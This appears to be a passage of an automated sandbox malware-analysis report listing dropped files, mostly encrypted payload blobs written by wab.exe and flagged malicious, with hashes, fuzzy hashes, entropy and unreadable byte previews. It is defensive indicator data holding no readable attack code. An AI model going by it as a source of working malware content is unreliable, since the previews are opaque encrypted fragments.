                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf663cf20, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                          Category:dropped
                                                                                          Size (bytes):20447232
                                                                                          Entropy (8bit):1.2828781574339125
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:CSikAm27+KSOfvKDr2P+Si5cphFxHfMZKF:0mxTDs+
                                                                                          MD5:DDC9E1EDE6C29DFFDB2586E05A058B20
                                                                                          SHA1:65859F02D76A8F743616A7D9BD3927C35E93E392
                                                                                          SHA-256:94A7FE062508E92C61F0606DC2E2EB7DB263765BFC0A856E1C3DDD2AFB48C85E
                                                                                          SHA-512:49228D57D4B52FEB9C0243BFD8F8BAD483C9049D30F631FD041F074EFDB056CCC8ABD71E1DFD5AD229E7BF4BDC66612BA1EC61DFD48155B647ACF3EE7BB012C9
                                                                                          Malicious:false
                                                                                          Preview:.c. ... ........=......J}...0...{........................"..........{.......{o.h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;..................................-J......{..................j..\.....{o..........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2
                                                                                          Entropy (8bit):1.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Qn:Qn
                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                          Malicious:false
                                                                                          Preview:..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):167597
                                                                                          Entropy (8bit):7.998804593822692
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyiRchkGKkFrEx5f9O7RYKztTQkkvIyrPIqaGVT6:YzytbGOX6A162hpKk5Q3OlHtT2A4IXGo
                                                                                          MD5:2C5BE0A2AAC3A8E723EEA204C504E30D
                                                                                          SHA1:125BCB1E382B23783FFE9F4BCADFDF949AA64C28
                                                                                          SHA-256:151B3BE3FEE549FA6B9CFAF91C7E6DC99CAE9ED9A031A2742311A07B6093D333
                                                                                          SHA-512:22253E39C0B89672100E6C9DC707DF19070B2EA2480D2593642A6080A579541160028F09485C888B046C206A3377D46E8AD3877D4EAD43D4A33F3C0E246A011A
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):171285
                                                                                          Entropy (8bit):7.998867262025784
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyiRchkGKkFrEx5f9O7RYKztTZ4DeHhoPy:YzytbGOX6A162hpKk5Q3OlHtTyDq/
                                                                                          MD5:5B671268B30C4E4CA23D459E55E86593
                                                                                          SHA1:510DF33119623F276B2449503724F31DFEA74E53
                                                                                          SHA-256:A6079C1DDCF36AAE9C0D455F64E8EBBA38C61B674805F1FD5A4F340DB3469C96
                                                                                          SHA-512:9271BB732CCBFB1912C877C22452157CDE2EC17B446CE937E1DE6854F6A820716D1933A8AFE74D1AEB76E4F109529E61BE6E44D582039688A42534151F194A0E
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):171328
                                                                                          Entropy (8bit):7.998916512719965
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyiRchkGKkFrEx5f9O7RYKztTpQ2vCjsB:YzytbGOX6A162hpKk5Q3OlHtTy2vFB
                                                                                          MD5:84C8E29B3410C54981CDB810B682A671
                                                                                          SHA1:716663AC7011444731077C650A11D7150B5EFAF6
                                                                                          SHA-256:390F4C994EDF2A7618D8841741B5518CDAFEA2B721345A680D83F84ACB447CC2
                                                                                          SHA-512:B85BCCDDB6D8518196D22D5DE7057E8E63C70ACD54C6A3FAC3D1F9FF772E2C2B782BA6D634D339D70869FBC3EF978B2384270D34AE9AB44CEE677C0BBF5196F3
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):169920
                                                                                          Entropy (8bit):7.998873304653036
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyiRchkGKkFrEx5f9O7B6E591sF96alVveZ:YzytbGOX6A162hpKk5Q3OlhS6T
                                                                                          MD5:E0E1E01C4C82543A4F677054EFFC1ED6
                                                                                          SHA1:BE6AA9B1A8FC96DAA600EAF315633D7E2F92C8C0
                                                                                          SHA-256:2946D18CDA17A98CA532609D847933B8F3B432503B31C51D9E85DBA3F182AD80
                                                                                          SHA-512:03CFC653F0DB740B0B7845E1D40BA0182D1F51A9790CDC6A0423BE09772C4665E28CE154B5EFEE731DB4A3F3CAC87B517E09584F11DBDB6CA73B82B4893C57D2
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185723
                                                                                          Entropy (8bit):7.999017862621176
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyidelJqV2iF4ie6E3tKOCuK+LIj7wFSHBejvO5:YzytbGOX6A16dGEZFne6KCuXLIj7wFKp
                                                                                          MD5:8A96CA482DF333A091365595DF99CAC0
                                                                                          SHA1:398C9956322F7CDFBE1C188B970EED5FAE0E02FF
                                                                                          SHA-256:35EF10F04EADFE875CA14190875D890062D27DA4023D5A1BFEA095541D9D221B
                                                                                          SHA-512:B9DCD0869EDA032B5D02C7A4BBB65F09A2243A47F169D38F60997F7E17D7D8E12A44F3A7A36EBF5CB5ED171630E765CBCA734EFBEDAAD65D3A06E305A5CEADB6
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185793
                                                                                          Entropy (8bit):7.998971307940591
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyidelJqV2iF4ie6E3tKOCuK+LIj7wFk/82MjMXj:YzytbGOX6A16dGEZFne6KCuXLIj7wFkL
                                                                                          MD5:25B010784BB4FD7997CBAAD8FD843104
                                                                                          SHA1:C97CAE8C6FF7807F55359B5DB6E4A058A96B72F1
                                                                                          SHA-256:29EB3AED97E867AC853FBABC1D640FF77F1F6FDF68E2D995D3202CFC2CAB11A1
                                                                                          SHA-512:7BCCC70CCCED942C70D279CD92F62082AA935115AB1437CB93C52349CD1BA6AF11B051B2C859A31490E012858E075A5A6651C946EB6029B59501416E3AEC10A9
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):190653
                                                                                          Entropy (8bit):7.99895892453198
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyi+Q/iJ95Nqa49PO7ezQplYZQ7BAt/3ASp7Pih2:YzytbGOX6A16+Q/gXEjPO7ZYey/QSMjg
                                                                                          MD5:4CF1C7153CFD53776F3B7CE1633C702B
                                                                                          SHA1:F88B6EB652BADDA160BF4A2E95E33A8C970720CE
                                                                                          SHA-256:6C396D71B6D47689B245F932BA12E8407B8FEF5458BC0182285CF62333C25B9A
                                                                                          SHA-512:37DF317BBC49672D1FA87B712E62ACB0FCC07ACCD9F3EA521F9AA85ACB3B3872CD82F4B31D9F16757B07EE2CA61001D3B655C1062DCDB113D1E2D509B41C084D
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):187677
                                                                                          Entropy (8bit):7.9989408388519
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyiReQPRrYzXWuijdLwlr/166La5O2BzcUpay1Q3:YzytbGOX6A16RbrYzX0Er/165T9w/
                                                                                          MD5:8435DF35656861F0502BCEDD6428830D
                                                                                          SHA1:77BFAD59396D97CE8BEC4247A4B623114D05F4C9
                                                                                          SHA-256:6894676A4E40BCCA0EFF3E916968B36509B3510CAF8DE1BF086FC3E5DC019C47
                                                                                          SHA-512:787D91EE9554EA9F4C27894526187C9F9AFF2C1DDACA850A75717B7943D21B1E3767099DAC564F2653FE92E2C7FA247A781C9BFDB286BE4937536339DA1E5FA5
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):191289
                                                                                          Entropy (8bit):7.999178177486442
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:Lfgodqy2nzBcppFKnljfehbLd4E3fsGZygKiECkB6I0pLjFlKK6R5S0I40QcjbgH:Lgo7qBccpfehfl3fsCy+ECkB6JRKFI4H
                                                                                          MD5:18B8EBC35DC2065EF717BE82D64A729E
                                                                                          SHA1:68F3F19F59E6F49F13F6E5B72AD26F2367D04FD9
                                                                                          SHA-256:92A64AA1094F10D94CE5887FFB163672ADC339EE3FF406773FC98459307650F2
                                                                                          SHA-512:86257CB81C25A113D1D340B04E4BE950717BB71FAF97B402BA753EC572BFE14DADBC094DF7A22D4FF55D78C6E28A4A32CAD876BBE8057D4AF04E2677898B15D8
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):193368
                                                                                          Entropy (8bit):7.99909450421486
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMZyUzNADLQBCQQ+ofc2+25K4k2sZKgmXw3uFwMAQfMABjjo7Y8:LURqd+McXDdDZuFwi5Bjjo77
                                                                                          MD5:DB2D3EB11861F25E3965CF95D4615A40
                                                                                          SHA1:AE4B20FDDB1751A27DA0215022BC498D4364519B
                                                                                          SHA-256:59C430D63B7A2026A92AFCE32D765D9583A7F10D6D749106D2FA7246CFA9DC56
                                                                                          SHA-512:97D6274E8FAB52283104566F5C39FF35F625686BC889BCA0D26732FF125E8CE68370835D2A4B972D22A49A3F2451711A9ABBB002CFC641D5354CAE682DA81A96
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
